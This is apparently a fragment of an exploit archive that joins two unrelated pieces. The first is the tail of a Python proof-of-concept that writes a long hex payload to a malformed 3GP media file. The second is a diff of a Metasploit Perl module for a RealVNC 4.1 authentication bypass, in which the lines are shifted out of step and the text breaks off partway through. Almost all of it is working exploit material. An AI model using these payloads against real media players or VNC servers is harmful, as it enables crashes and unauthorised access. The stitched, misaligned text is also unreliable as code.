 \x79\x50\xAD\x4D\x11\xBE\x1E\x82\xCC\x34\x14\xD5\x61\xAD\x9C\xB9\xD9\x49\x68\x4A\xF9\x70\xD6\x34\x38\x2C\xC1\xB4\xB4\x63
 \x75\x48\x52\xB6\xF7\x77\x99\x20\x9E\xA2\xA6\x31\x16\x0B\xF4\x25\xC1\xF3\x5D\xEA\x85\xCA\x74\x25\x66\x5F\x8B\xA3\x15\x54
 \x8B\x1E\x51\x8B\xA3\x7A\x50\x59\x86\x85\xEF\xA1\xC7\x91\xF0\x5F\xA1\x2C\x4B\x0A\x2A\xD3\x34\x97\x14\x37\x16\xEF\x4D\x51
 \x8C\x5C\xF3\x61\x23\x0A\x80\xB7\xA6\x2D\xCE\xAF\xDE\x14\xDB\x5F\x8B\x30\xD0\xBE\x84\xB4\x20\x34\x6A\x83\x0C\x5B\xE0\xC1
 \x49\xE4\x71\x4C\xDC\x96\x61\xA1\x7B\xD9\x66\x1A\x17\xBF\x82\xB1\xA9\x37\xAA\x56\xE2\x8D\xB8\x0B\x12\x8B\x08\x99\x66
 \x1A\x0A\x59\x66\x1A\x17\xBF\xE9\x89\x65\x98\x68\x29\x65\x98\x68\x29\xA9\x4F\x96\x59\x86\x82\x96\xA3\x0D\x05\x33
 \x8C\xAB\x6D\x64\x6D\xB7\x97\x1B\x6D\xFC\x6D\xB7\x78\xDB\x6E\x71\xB6\xDF\xC6\xDB\x7F\x1B\x6D\xFC\x6D\xB7\xF1\xB6\xDF\xC6
 \xDB\x73\x7F\x00\x00\x01\xB6\x51\xE2\x07\xFF\xB8\xAE\x0A\x72\x5C\x7C\xB3\x61\xAF\x28\x8A\x47\xA6\x5D\x77\x2E\x56\x38\xF8
 \xE3\x17\x2B\x95\xD5\x85\x24\x7C\xBF\xCB\xE5\xE5\x55\x7D\x8C\x56\xFB\xEE\xAE\x5F\x75\x7D\xF2\x5F\x3B\xA5\x0B\xBD\x3D\x36
 \x2D\x47\x14\xD9\x76\x6D\xA5\x26\xF7\xC5\xEF\xF7\x49\xF7\xDA\xF5\xA7\x92\xE9\x2B\xFE\xC6\xAC\x4F\xF2\x81\x6A\xD8\xD8
 \xEF\x4B\x05\x64\x27\xBA\x8D\x64\x25\x75\xE1\x80\x84\x2C\x2A\x68\xFD\x06\x27\x09\x77\x97\x16\xD7\x6E\xD1\x69\xA9\xD0\x49
 \xD7\x9B\x3F\xCB\xFC\x9B\xB6\x56\xFA\x1A\x90\x11\x14\xFD\x67\x21\xE5\x5F\x57\x15\x0F\x35\xAF\xD5\x04\x3A\x75\x29\x4B\xC4
 \xB9\x83\xF5\x64\x62\xAB\x6D\xDB\xA6\xF7\x24\xD8\xAF\x7D\xF7\xCB\x0D\x48\xA0\xF2\xB4\xCE\x1B\xF9\x31\x3B\xEE\xB3\xA5\x59
 \x29\x84\xAE\x7F\xFF\x7F\x00\x00\x01\xB6\x52\xC2\x27\xFF\xBA\xB8\x37\x2A\xC3\x70\xD9\x3F\x2B\x45\x2C\x11\xB8\x57\x70
 \xDD\x52\x6B\x9E\xDE\x9E\x75\x71\x37\x15\x4C\x68\x32\x59\x42\x87\x15\xEF\xA9\xB4\x18\x8C\x94\xCD\x96\xA1\xC1\x83\xD9\xD0
 \x4D\x09\x64\x15\xAF\xEB\x02\xC2\x42\xC1\xEA\x17\x0A\x4D\x2A\x74\xA2\xEF\x5B\x01\x2C\x6C\x13\x2E\x93\x64\x83\x34\xCD\xB5
 \x0D\xC9\x26\x6C\xBB\x2F\xC7\xA2\x9E\x16\x08\xF8\x94\xDF\x17\x6B\xF6\xA8\x58\x46\xE3\xCC\x73\x65\xF3\xE0\xA2\xA9
 \xDE\xDE\x75\xB6\x86\xE5\x83\x31\x69\x32\xE6\x8B\xAD\xFC\x19\x2D\xCC\x59\xB1\x82\x98\x26\x48\xCA\x51\x76\xE2\xAC\x26\xF4
 \xD4\x94\x94\x2B\x01\xA9\x34\xC4\x29\xC8\x56\xBD\xAD\xC1\x99\x13\x33\xF0\x16\xE6\x30\x8C\x14\x4C\xA4\x18\xCC\x12
 \xBF\xDA\x3C\xAC\x0E\xF2\x14\x15\x9E\x7B\x12\xE9\xA7\x91\xBA\x39\x11\xCF\x83\x14\xFA\x8C\xD3\x24\x1C\x51\x7E\x08\xD2
 \xCE\xF8\x2E\xB3\xDB\x00\xA5\x06\x1B\x0B\x08\x94\x34\xAD\xF9\x48\xE5\xD8\x4E\xC2\x8D\x67\x85\xA6\x8D\x31\x3F\xAB\x54\x07
 \xBF\xFF\x13\x0A\xFB\x86\xA1\x61\xCB\x80\x53\xB9\x07\xF9\x53\x69\xB1\x31\x36\x18\x0F\x61\x7D\x87\xC8\xC6\x6C\x39\x21
 \x1B\x19\x20\x31\xA5\x2A\x72\xC9\x90\xCD\x68\xD9\x93\x55\x10\x90\x25\xC5\x10\x7A\xDA\x91\xD2\x3F\x5D\x9F\x44\x7E\x51
 \x1A\xED\xE3\x63\x45\xD4\x20\x8F\xFF\x04\x95\x4A\x95\x83\x33\xEE\x7D\x3A\xCF\x04\xBB\x82\x90\xC2\x14\x53\xF3\xA7\x67\x26
 \xDE\x48\xDE\x84\x64\x57\x83\x2C\xA9\xC8\xD5\x0B\x73\xDB\x1B\xBB\xDE\x24\x31\x33\x04\x17\x94\xA6\x16\x81\xE1
 \x3F\x7D\x5E\x0E\xB3\x6D\xE8\xCF\x86\x5D\xB2\xD5\x54\xB6\x52\x95\x48\x89\x89\x28\xB7\xD2\xA6\xB0\x8F\xFF\xEF\x00\x00\x01
 \xB6\xE5\xE2\x27\xFF\xBA\xF5\x85\x26\x71\x77\x17\x71\x58\x16\x28\x9B\xBD\x43\x4F\x38\xA5\xB8\x4A\xF3\xF2\xBE\xE1
 \xAE\x5E\xEA\xEA\xEA\xFB\x19\x3B\xED\x38\x84\x30\x75\xEF\xA9\x9C\x30\xAB\xE9\x9D\x34\x99\x8F\xD6\x6F\xAC\x5D\xCB\x40\x28
 \xED\x3C\xBC\xF6\x68\x1C\x03\x88\x98\x3C\x49\x04\xCC\xDA\x98\xB4\x50\xA2\x3F\xFB\xC7\xE0\x89\xA4\x6B\x78\xD3\x9F\xB8
 \xAE\x15\x6D\xC0\x49\x84\x6B\x50\xA9\x72\x03\x57\x81\x67\x25\x89\x68\xC0\xC8\x34\xA5\x8D\x72\x95\x14\xBF\xE5\xFE\x80
 \x6D\x50\xEF\x37\xAD\x0B\x3F\x27\x47\x4F\x23\xA9\xCA\x72\x88\x8D\x72\xB0\xB1\xDF\x45\x99\x51\x29\x41\x60\xBC\x14\x56\x29
 \xDF\xEF\x51\xF9\xB2\xC7\xA9\x03\x73\xEB\xEA\x0B\x14\xC1\x81\x9C\x35\x34\x47\x63\x0E\xA8\xCE\xD8\x95\xEA\xA8\x1B\x4B\x05
 \xF2\xAB\x82\x52\x82\xFF\x88\xCA\x64\xFA\x4B\xCD\xA2\xF4\x4D\x3C\x4B\x12\x4B\x80\xF5\xDF\x74\xBB\xF3\x7D\x5B\x9D\x84\xE7
 \xDD\x6E\x57\x73\xED\xD5\x29\x3B\x05\x21\x6B\xD5\x49\xBD\xD7\x2A\x57\x54\x00\x51\x1A\x35\x39\x16\xEA\x99\x77\xF9\x75
 \x4C\x95\xB2\x3D\xFD\xCC\x8C\xFF\x89\x3C\x68\xCC\xBC\x45\x07\x0E\x25\xB6\x52\x5F\x76\x8F\x65\x59\x12\x22\x2A\x07\xE4\x95
 \x55\x69\x5D\xF3\x6D\x6B\x88\xA1\xC2\x93\x4F\x9E\xB0\x0D\x5D\xCC\xC4\x89\x05\x98\x68\x52\xF9\xD2\x0C\x29\x90\x99\xB5
 \x7A\x1F\x11\x9F\x34\xD2\xCE\x8C\x9A\xC4\x31\x83\x2A\x78\xE9\x2C\x13\x82\xF0\x4A\x09\x7B\xF0\x7B\xE5\x0C\x3E\x7B\xDE\xF6
 \xA8\xE6\xF6\xF4\x73\xA3\x24\xB2\x6E\x41\xC3\x17\x90\xF1\xF3\x8E\xAD\xFB\xDD\x5A\x98\x94\x87\x20\x75\x1C\xE2\x80
 \x2E\x8F\x21\xC8\xAB\x70\x76\x50\x2E\xAD\x9C\xFF\xEF\x00\x00\x01\xB6\x54\xC2\x67\xFF\xBA\xF2\x41\xC2\x22\x42\xB6\xC5\xC1
 \x7B\x9C\x1B\xB8\xBA\xC1\x4C\x2A\x63\x97\x68\x8B\x41\x55\xA3\x07\x49\xA2\x9F\x38\x4B\x3B\xAD\x83\x0C\x8A\x17\xC2\x30
 \x2B\x60\x21\x1A\x7A\xE8\xC2\x17\x63\x5B\xD4\x42\xD0\xA9\xB5\xC6\x2C\x05\x4E\x3A\x69\x93\xF7\x75\xB0\x1C\xA2\x36\x6E\x32
 \x88\x58\x02\x0F\xB2\x77\xFC\xFA\xC8\x45\xCC\x5B\xBA\xDF\x95\x81\xAF\x81\x47\xA1\x38\x31\xA1\xBB\xC5\x2A\x81\xC1\x50\xD4
 \x14\x2E\x0B\xD0\xD4\x58\x5B\x3E\x3A\xB2\x7C\x60\x34\x21\xCE\x61\x69\x84\xCC\xFD\xA4\x9B\x06\x5E\x1E\x97\x45\x34
 \x7A\x0C\xD5\x8A\x48\x4A\x18\x3E\x86\x17\xF6\xC9\x9D\x6D\xA2\x52\x4E\x10\x0F\x92\xAC\x9A\xA4\x0B\x28\xC4\x22\xDD\x6C\xF2
 \xFC\x58\x8F\xD5\x84\xA0\xC5\x0F\xDC\x19\x04\x3C\x2A\xAD\x1B\x51\x47\xED\x8D\xA8\xC8\x29\xB5\x65\x93\x41\x89\xD8\xE2\x12
 \x13\x11\x8F\x95\xB6\xAB\x6B\x5F\x06\x38\x78\x7C\x24\xCB\x6F\xB1\x2A\x4E\xB9\x20\x59\xA7\x88\xF5\x6F\xB0\xFF\x6D\xB2
 \x8E\x87\x7C\xE0\x88\xA4\x76\xD5\x2D\x21\x9C\xFC\x64\xF1\x1A\x4A\xD4\xBC\xD1\x70\x79\xC1\x56\x74\x34\x16\xA6\xAB\x21\x46
 \x2D\xD6\xC1\x86\xA4\x23\x30\xB6\x4D\x05\x19\x65\xBE\x9E\xED\x97\xBE\xC1\xE8\xEF\xDE\x59\xCC\x05\x31\xF8\xFD\x57\xB2\x09
 \x63\xE5\x72\x89\x56\xE6\x2C\xAE\xEF\x09\x2C\x70\xFB\x84\x5A\x0A\x14\xFC\x3E\x63\x6F\x98\xD3\x49\x30\xF4\x69\x8E\x23\xE3
 \x63\x51\x82\xD6\x16\x25\x05\x13\xCF\x9E\x35\xC8\x98\x81\x64\x57\x73\xCA\x53\x9D\x33\x18\x72\xEE\xCB\xBD\x67\x66\x9C\xD1
 \xDE\x64\x11\x95\xA9\xA0\x4F\xD6\x58\x52\x34\x97\x89\x05\xB1\x55\xA0\x44\x7B\xA0\x4A\xF8\x5A\x44\x45\x26\x20\xB3
 \x3E\x5F\xF0\x34\x08\x6A\xF4\x47\x65\x65\x87\x1A\x63\xB2\x72\x01\xC6\x40\x83\x64\x44\xE8\x0E\x2A\xF0\xCF\x99\xF1\x09\xA9
 \xC7\xB8\x33\x89\xE5\xDE\x9D\x77\x14\xF9\x22\x0E\xBF\x83\x90\x33\x86\xB8\x74\xE7\xF8\x98\x15\x67\xD6\x81\x51\x5D\x44\x10
 \x73\x6F\x49\x0A\x5B\x70\xD2\x92\xF2\x03\x19\x64\x5B\xFF\x66\x7B\x5A\xCE\x13\x38\xB7\x6B\xDC\x34\xE9\xE6\x6A\xE4\x05\x61
 \x01\x98\x90\xE3\xF5\xF6\xE8\xEE\x81\x31\xD8\x0F\x7B\xFF\xF7\x00\x00\x01\xB6\x55\xE2\x27\xFF\xBA\xF2\x4C\x54\x21\x15
 \xDB\x1A\x5C\xF9\x1E\xB6\x4F\xCD\x11\x22\xD2\x06\xF3\x05\x4C\x09\x16\x81\x11\x59\xFB\x4E\x0A\x4E\x12\xFC\xFA\x82\x5D\x82
 \x03\xD2\xF5\x00\xE4\xF1\x47\x62\x58\x5A\xE1\xBC\x28\x94\xE4\xDD\x66\xEC\x27\x1C\x16\x8C\xFA\x48\x34\x37\x54\xE7\xB2\x76
 \x64\xCB\x4F\xAC\x47\xA2\xC3\x3D\xC2\x8F\x50\x61\x79\x2C\xA5\x2E\x74\x91\xA4\x4E\x4E\xE3\xBD\xF1\x92\x07\x5D\x60
 \xEB\xDF\x05\x20\x15\x06\x28\x0C\xCD\xBC\xD1\x11\xFB\x74\x23\x25\xFB\xA3\x51\xA1\x9A\x71\xB9\x43\xA1\xF2\xC7\x7A\xB4\x90
 \xF1\x0E\xE8\x39\xB0\x75\x13\xF6\x5C\xF7\x34\xB1\x73\xC3\x7D\x1A\x00\xB7\x30\x74\x69\x80\xA5\x65\xCA\xA5\xA0\x75\x03\x43
 \x93\x4A\x79\xA7\x97\x94\x67\x02\xB5\xC8\x37\x15\x10\x77\xEF\xB6\xA9\x29\x43\xCF\x2A\xF8\x1B\x55\x00\xAD\x19\x19\xAD\x77
 \x8F\x4C\x95\xDE\xE8\x19\xB3\x35\x64\x24\x3C\xC2\x54\xEC\x6F\x05\x61\xD1\x13\x12\xE2\x86\xB8\x29\xAC\x8B\x13\xA1\x67\x90
 \x90\x8F\xD5\xC6\x46\x4A\xBA\xD8\x17\xE2\x07\x19\x36\x6C\xF9\x38\x88\x96\x14\x56\x9F\xDB\x97\x00\xE6\xCF\x2B\xA9\xB6
 \x5E\x11\x17\x29\x1D\xFB\xD7\x85\xEC\xCC\x38\x43\x66\xC9\xB6\x6B\x4D\x02\x69\xF2\x41\x6F\x28\xF7\xD4\x46\x99
 \x9A\xDB\x3E\x16\x40\x57\x9D\x07\x34\x72\x98\x2C\xD6\x9E\x06\x77\x02\xCE\x65\xED\x5C\x27\x5C\xF9\xBA\x4A\xB1\x89\x05
 \xFF\xC9\x13\xED\x98\x8B\x76\x21\xA4\x6B\x7E\x53\x29\xA7\x81\xF7\x10\x99\x0D\x01\x7F\x55\x70\x98\xCB\xD1\x6A\x53\x46\xD3
 \xF2\x08\x22\xC3\xAF\xB0\x66\x1A\xC5\x4B\xEC\xE9\xCF\xD9\x56\x21\x8B\x1F\x29\x18\x66\x61\x61\x80\xE1\x86\x7F\x0C\xE5
 \x1E\xCD\x75\xE9\x59\x64\x38\x46\x9C\xA1\xC4\x0D\xEE\x81\x94\x4C\x1B\xEF\x79\xDC\xBF\xE8\x22\x0C\xD0\x3A\x70\xA0\x80\x89
 \xA8\xFC\x16\xFF\xFA\x06\xD8\x2A\xBA\x52\xEE\x5C\x5E\x6A\x02\x16\xCA\x9C\x2A\x70\x52\x56\x28\x54\xCB\x3A\xE6\x49\x52\xE2
 \x51\xAF\x12\x90\x8D\x08\x3D\x5B\x4E\x62\x33\x4D\x13\x14\xA5\xDD\xA4\xE8\x4E\x28\x29\x10\x8B\x0E\x0A\x07\x0B\x07\x67\x93
 \x30\xE5\xC2\x40\x95\x7D\x6A\x8F\xDF\xCB\xD5\x04\xDB\x6B\x1E\xD6\xC0\x91\x2A\x44\x95\x01\xAE\x99\x29\x60\xF2\x0D\x06\x47
 \x39\xC3\xEA\xE6\x72\x1E\x28\x6B\x77\x4E\x4A\x55\xCB\xE6\x27\xB5\x28\x60\x57\xCF\xC5\x8E\x9F\xFF\xBF\x00\x00\x01\xB6\x56
 \xC2\x27\xFF\xFB\x01\x5F\xE8\xE8\x02\x37\x06\xF6\x02\x89\xCA\x05\x11\xFF\x00\x43\x82\x22\x46\x65\x36\xEE\x51\xA8\xCF\x84
 \x6B\x22\x61\xCB\x03\x13\x0C\x00\xE7\x62\x70\xE4\xF0\xDB\x19\xD4\x2D\xA0\x9C\xFB\x4B\x0E\x9A\xA5\x5D\xF1\x97\xBB\x65
 \x3F\x08\xDC\xE5\xF8\x2B\x8C\x3B\x78\x8D\xB8\x17\xF7\x9B\x56\x96\x03\xBC\xE3\x37\xA0\xAE\x3E\xF2\xDE\x34\x80\xF0\x56
 \x9A\xD5\x3A\xB1\x02\x7E\x0D\x60\x57\x01\x3C\x0A\x4D\x02\xB9\x00\x68\xA8\x05\x83\x28\x9A\x3C\x54\x06\x6F\xBD\xA9\x7E\xE8
 \x40\x6D\x13\x05\xC6\xCE\x04\x12\xE9\xE8\x25\x0F\x2F\x94\xA9\xAD\x08\xBC\x64\x02\x79\xDF\xE3\x4C\x21\x7A\xC8\x0D\x97
 \x5A\x07\x15\xAF\xEF\x5A\x34\x27\xF1\x87\xE5\x11\x9E\x08\x4A\x3F\xFF\x89\x7B\x64\x1F\xA8\x51\x91\x30\x50\xBB\x12\x62\x24
 \xC0\x51\xD9\xB6\x14\x85\x0D\x04\x39\x5E\x86\xA4\x9E\x1C\xD2\xC8\xF2\x2E\x61\x38\x1E\x05\x20\xC7\xEC\x12\x88\x63\x00
 \x8F\x43\x57\xD1\xB2\xFC\xEA\x32\x05\xA6\x46\x4A\x91\x48\xBA\xC2\xA4\x5E\xA3\x59\xC5\x2B\x90\x5A\x66\x8D\x25\x8D\xC1\x98
 \x37\x7E\x07\xBE\xD0\x16\xF3\x2D\x29\xFE\xD4\xC4\x50\xB0\x50\x5C\xDF\xBD\x60\x29\x95\x75\x7E\x15\x9E\x05\x37\x67\x2E\x01
 \xB1\x71\x75\x54\x07\x2F\x89\xE6\xA8\xF1\x62\x13\x92\x41\x19\x36\x15\x1E\x5C\xF9\x1B\xAB\x51\xFA\x72\x0F\x20\x89
 \x9E\x1A\x73\x9B\xA4\x8B\x83\x10\xEC\x6D\x43\x0F\x5D\x05\xBB\xDE\x99\x24\x59\xCC\x30\x33\xED\xD6\x1F\x3E\x44\x68\xC9\xA1
 \x3E\x71\x72\x13\x33\x98\x69\x67\xCE\x95\x8D\xB8\xE0\xA4\x87\x86\x2F\x9B\x37\x16\x6C\x2C\x1A\x8E\x94\x8E\x9A\x25\x4C\x28
 \x2B\xC7\x80\x32\x83\x0E\x8B\xC7\xAA\x15\xD5\x3C\xE2\x9F\xB7\x63\x02\x37\xB2\xBE\xF3\xC2\x31\xAF\x7E\xA9\xAA\x31
 \x1A\xDF\x6C\xE8\x47\x94\x6F\xC3\x99\xAD\x29\xE7\x4D\x23\x3C\x9B\x5E\x2C\x6B\x3C\x8E\x64\xE1\xD4\x87\x19\x7E\x20\xA1\xE1
 \xE8\xEA\xFC\x37\xD0\xAA\x31\x1C\x68\x34\x1C\x30\x47\x07\x72\x70\xC4\x20\x9F\x95\x8C\xE9\x43\xA5\xCF\x3C\x88\xD9\x23\x92
 \xC6\xE0\xB6\xDB\xF9\x65\x94\x46\x66\x11\x01\xCF\xE5\xFA\x8F\xD9\x59\xCE\x0C\x97\x47\xBA\xA5\x14\x1A\x9F\x58\x0D\x03\x30
 \xDF\x16\xDE\x69\x13\x83\x36\xB3\xA7\x21\xDA\x4C\x32\xF7\x60\x1A\x3C\x45\xF9\x99\x81\x64\x65\x87\x70\x46\x44\x7F\x8C\x31
 \x0D\x14\xFC\xC8\xC9\x33\x5C\x90\x29\xE1\xD0\x84\x5E\x07\xA4\x56\x3D\xB6\xC5\x6C\x72\x61\x8F\x55\x5E\x57\x65\x57\xE5
 \x2A\x1A\x53\xDC\x1A\x84\x7A\xAA\xB6\x2D\x99\x3E\xA1\x05\xBD\xD0\x76\x91\x25\xAA\x7B\x0F\x0A\x94\x61\x33\x51\x86\x82\x97
 \x85\x4E\xC2\x83\x57\x8E\x2F\x03\x68\x1D\x03\xA7\x12\x2B\x1A\x31\x4E\x73\x26\xA9\xCE\xC6\x93\x11\x36\x23\xD7
 \xBC\xFF\xFD\x01\x40\x40\x06\xF7\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\xF0\xBB\xA4\x3E\x0F\x87\x90
 \x82\x6F\xE0\x03\x76\x08\x08\x15\x56\x73\x3E\x2C\xFD\xA0\x23\x9E\x24\xC7\x0A\xA0\x41\x1C\x29\x62\x94\xA6\x0C\x5C\xC3
 \x1F\x78\x9F\xC3\x8F\x0F\xC7\x38\x84\x2E\x9F\xF1\xA9\xE6\x0D\x16\xEC\xBF\xF2\xAB\x21\x5C\x7D\xD7\x04\x70\xA9\x7A\x2F\x03
 \xFA\xE5\xE1\x0B\x1F\x6F\x3F\x1C\x8E\x32\x04\x2F\x54\x26\x78\x50\x2F\x9D\xDD\x5F\x8D\x0F\x14\xB3\xAC\x63\x45\x86\x88\x48
 \xF4\xB6\x84\xDF\x8D\x86\x88\x51\xD5\x3A\x7F\xE9\x14\xD7\x05\xCD\x19\x97\xD1\xA2\xF1\xDD\x31\x1F\x35\x30\xB6\x97\x76
 \xEF\x62\x6E\xCE\x99\xD9\x5A\xA3\xC5\x27\xBC\x20\x1D\x01\x1E\xBA\xD8\xBE\xA6\x8D\x92\x13\x90\xDA\x41\x44\x49\x0B\x72\x54
 \x00\xBC\x7F\x5E\xF0\xDE\xB5\x40\xC4\x17\x42\x6D\xC6\xC9\x28\x15\x4D\x9C\x04\x05\xF1\x1A\xCD\xF3\x32\x5F\xBC\x0A\x70
 \x1A\x48\x2F\x30\x0F\x96\x7D\xA3\x45\xE0\xB5\x67\x49\x6B\x4D\x85\x78\x5E\x01\x97\x03\x11\xBB\xDA\x42\x04\x43\xF0\x35
 \x6C\x0C\x37\x81\x1A\x98\xD9\xC3\x9E\xAE\xA6\x6E\xAB\xAB\xD8\xA4\x64\x28\x70\x74\x3E\xB0\x6E\x31\x6D\xF5\x51\xA8\xF5\x36
 \xD7\x2B\x97\x74\x0B\x4B\x5A\x75\xD0\x6F\x64\x23\xAB\xC5\x6F\x05\xA4\x74\xF7\xA2\xBC\x08\x75\x47\x58\xF0\x78\x12\x67\xA8
 \x2F\x32\xC7\x78\x57\x1D\xFA\x36\xB6\x32\xD4\xFC\xD4\xFA\xC4\x00\x57\x8C\xAB\x09\xF7\xC8\x98\xC0\x12\xCF\xB0\xDD\xA6\x60
 \xCA\xD5\x1A\x61\xAD\x41\xF6\xEE\xF8\x22\x60\x60\x12\xBF\x69\x57\x9A\x70\x01\x2D\x1A\x0D\x19\x26\x1E\xB6\xF3\x59\x93\x30
 \x2D\xF8\x70\x58\x9F\xF6\x6F\xA5\x3B\x5D\xC4\x1C\x16\x58\xD2\xAA\xBD\x01\x4E\xD5\xA2\x08\xD6\x12\x0C\x52\x6F\x9D\x0C\x55
 \xEF\x41\x56\x30\x02\xD2\x05\x00\x50\x3C\xDC\x43\x64\x46\x40\xB7\x91\x47\x34\xA3\x3C\x8A\xDC\xC9\xD6\xA4\x42\x0F\x40\xA3
 \x91\x78\x85\x88\x4A\x79\x11\x13\x43\x37\xCC\xE3\x40\x60\xC3\xB3\x6C\xFB\x9D\x26\xEB\x8F\x1A\xAE\xB9\xA4\x00\xE0\x07\xF9
 \xDF\x62\x2B\xE7\xC9\x4B\x1D\x77\xD9\x2B\x1B\x47\x89\x6C\x84\xBD\x89\x1C\xE4\x23\x7A\xE7\xB9\xD8\xCA\x6A\x17\x68\x88
 \xCF\x0A\x16\x82\x49\x7B\x8E\x83\xD9\x1E\xC5\x54\x44\x9A\x33\x69\x4D\xC7\x6C\xE4\xD2\xC9\xF8\x1B\xFB\x63\x79\xE8
 \x9A\xEB\xFE\x73\xE8\xE0\x5A\xF8\x61\xEE\xB4\xE7\x3F\x4E\x0D\xBA\x11\x9F\xBD\xB6\xD7\xF2\xA6\xC9\xF7\xCE\xF8\x6C\x4E\x93
 \xBE\x0E\xB0\x51\x49\xC6\x9F\x2C\xDB\x10\xF3\x46\xB8\xFC\x7C\xED\x30\x3F\x01\x50\x15\xA4\x8C\xA5\x3A\x26\x02\x43\x34\xB1
 \x80\x5D\xFC\xC5\x3C\x8A\x00\xBC\x0B\x00\x4E\xEE\x2E\xC3\xE6\xB5\xAF\xC7\x49\x53\xFB\xB9\x80\x61\xFA\xF1\xB5\x33\x07
 \xBD\xD0\x28\xA9\x0A\x97\x2B\xE3\xD4\x15\x58\x9D\xE3\x31\xD5\xC8\xA4\x7D\xD3\xAE\x29\xB1\xCB\x0E\xEA\x84\x57\xA9\x86\xF2
 \xB2\x1F\xC5\xF8\x11\xF4\x53\xE7\x6F\xE1\x36\x73\x12\xDB\x6B\x3A\xF7\xE4\xF8\x59\x74\x84\x12\x93\x5A\x9D\x3A\x16\xCF\xB9
 \xC3\x33\x4C\x7E\x54\x10\x77\x2D\x41\x11\x48\x0F\xA0\x77\xF1\xE8\x56\x09\x93\xDA\x13\x67\x4F\x5A\xA4\x67\x6B\x8B\xEA\x86
 \x2C\x44\x10\x53\x12\xD1\x61\x55\x7B\x68\x02\x78\x26\x11\x67\x9F\xF5\x77\x55\xB5\xA7\x4E\xC3\x36\xBE\xC5\x4E\x7D\xE9\xD5
 \xCB\x48\x07\x01\x52\x15\x9D\x14\x66\x11\xA9\x08\xC2\x35\xAA\x50\x03\x00\x06\xEC\x05\xB1\x60\x23\x5B\x5B\x3D\x67\x75
 \xED\x1E\x8E\xF4\x3D\x70\x22\x43\xA9\x72\xB0\x1C\x8C\x1C\x42\x79\x22\x8E\xD3\xB8\x05\x1A\xA1\x1D\x0E\x9F\x31\x6D\x2D\x59
 \xF9\x4D\x04\xEE\xDD\xD5\x7A\xB8\x7D\xEC\xA6\x65\x7C\xEB\x40\x53\xF9\xF3\xD7\xBD\xAF\xF5\xBF\x27\xB5\xDC\x53\xB6\x3D\x68
 \x53\xCE\xE3\xD9\x4E\x14\x29\x29\x24\x1C\x20\x4A\xE0\xDC\x33\x25\xC9\xB2\x75\x22\xE2\xEC\x76\x0E\x38\x96\x6B\xE8\x89\xC0
 \x50\x9D\x03\x5A\x00\x5E\x71\xCF\x61\x74\xC5\x55\x01\x4A\xC7\x30\x5D\xAD\xEA\x60\x0E\xAD\xC7\x3B\xC6\xED\xCE\x40\x0E\x01
 \x4E\x15\x99\x56\x15\x31\x25\x4E\x2A\x66\x52\xD2\xCF\x7C\x0E\x80\xC0\x4A\x03\x52\x94\x02\x9D\x98\xE6\x45\xA8\x02
 \x9C\xBA\x7C\xFA\x25\xB2\x00\x59\x1D\x59\x76\x47\xD9\x6A\xDC\x26\xE8\xB7\x68\x76\x44\x8C\x3D\xFB\xC7\x42\x07\xE8\x63"
 outfile = file("poc.3gp", 'wb')
 outfile.write(data)
 outfile.close()
 print "Created Poc"
--- a/platforms/multiple/remote/1794.pm
+++ b/platforms/multiple/remote/1794.pm
@ -1,214 +1,213 @@
-
+##
-##
+# This file is part of the Metasploit Framework and may be redistributed
-# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
-# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
-# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
-# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
-# version of the Framework can always be obtained from metasploit.com.
+##
-##
+
-
+package Msf::Exploit::realvnc_41_bypass;
-package Msf::Exploit::realvnc_41_bypass;
+
-
+use strict;
-use strict;
+use base "Msf::Exploit";
-use base "Msf::Exploit";
+use Pex::Text;
-use Pex::Text;
+use IO::Socket::INET;
-use IO::Socket::INET;
+use POSIX;
-use POSIX;
+
-
+my $advanced = {};
-my $advanced = {};
+my $info =
-my $info =
+  {
-  {
+	'Name'           => 'RealVNC 4.1 Authentication Bypass',
-	'Name'           => 'RealVNC 4.1 Authentication Bypass',
+	'Version'        => '$Revision: 1.1 $',
-	'Version'        => '$Revision: 1.1 $',
+	'Authors'        => [ 'H D Moore <hdm[at]metasploit.com>' ],
-	'Authors'        => [ 'H D Moore <hdm[at]metasploit.com>' ],
+	'Description'    =>
-	'Description'    =>
+	  Pex::Text::Freeform(qq{
-	  Pex::Text::Freeform(qq{
+		This module exploits an authentication bypass flaw in version
-		This module exploits an authentication bypass flaw in version
+	4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
-	4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
+	between a VNC client and a vulnerable server. Credit for this should
-	between a VNC client and a vulnerable server. Credit for this should
+	go to James Evans, who spent the time to figure this out after RealVNC
-	go to James Evans, who spent the time to figure this out after RealVNC
+	released a binary-only patch.
-	released a binary-only patch.
+}),
-}),
+
-
+	'Arch'           => [  ],
-	'Arch'           => [  ],
+	'OS'             => [  ],
-	'OS'             => [  ],
+	'Priv'           => 0,
-	'Priv'           => 0,
+
-
+	'UserOpts'       =>
-	'UserOpts'       =>
+	  {
-	  {
+		'LPORT'   => [ 1, 'PORT', 'The local VNC listener port',  5900      ],
-		'LPORT'   => [ 1, 'PORT', 'The local VNC listener port',  5900      ],
+		'LHOST'   => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0"  ],
-		'LHOST'   => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0"  ],
+		'RPORT'   => [ 1, 'PORT', 'The remote VNC target port', 5900      ],
-		'RPORT'   => [ 1, 'PORT', 'The remote VNC target port', 5900      ],
+		'RHOST'   => [ 1, 'HOST', 'The remote VNC target host'],
